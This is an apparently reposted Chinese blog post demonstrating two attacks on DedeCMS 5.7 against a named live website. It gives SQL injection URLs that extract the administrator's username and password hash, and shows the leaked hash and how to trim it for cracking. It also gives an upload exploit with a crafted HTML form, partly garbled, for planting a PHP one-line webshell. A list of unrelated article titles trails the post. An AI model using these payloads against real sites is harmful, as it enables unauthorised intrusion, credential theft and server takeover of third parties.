织梦5.7注入加上传漏洞
来源:互联网 发布:贵州大数据企业排名 编辑:程序博客网 时间:2024/05/22 02:18
①注入漏洞。
这站 http://www.30tianlong.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
然后写上语句
查看管理员帐号
http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin
查看管理员密码
http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
查看管理员密码
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
8d2
9b1ef9f8c5a5af42
9
cmd5没解出来 只好测试第二个方法
②上传漏洞:
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
<form action="=../dialog/select_soft_post]
<[/url">http://www.yunsec.net/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
即可上传成功
- 织梦5.7注入加上传漏洞
- 织梦5.7注入加上传漏洞
- 织梦5.7注入加上传漏洞
- joekoe CMS 4.0 两个漏洞(上传漏洞+注入)
- 织梦dedecms漏洞修复大全注入漏洞
- BOSSI 公司(企业)网站管理系统注入&上传漏洞利用
- cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修复)
- “织梦”CMS注入高危漏洞情况
- 上传漏洞
- 上传漏洞
- 上传漏洞
- 织梦cms v6.7最新上传漏洞
- 数据库注入漏洞【续】
- Sql 注入漏洞,注意
- SQL注入漏洞
- sql注入漏洞原理
- 数据库注入漏洞
- SQL 注入漏洞新动向
- 带延时加载,自动刷新和拖动控制的Canvas
- DEDECMS 5.7 后门 exp再修改版
- FileUpload上传控件用法详解
- android 低内存管理机制
- google排名
- 织梦5.7注入加上传漏洞
- HTTP请求:GET与POST方法的区别
- VC关于键盘输入(转)
- Android 绑定类型服务---简介
- YAHOO YUI工具库
- Android 绑定类型服务---创建绑定类型的服务
- 一年成为Emacs高手(像神一样使用编辑器)
- 服务器 负载均衡 load balance
- Navicat备份mysql数据库的方法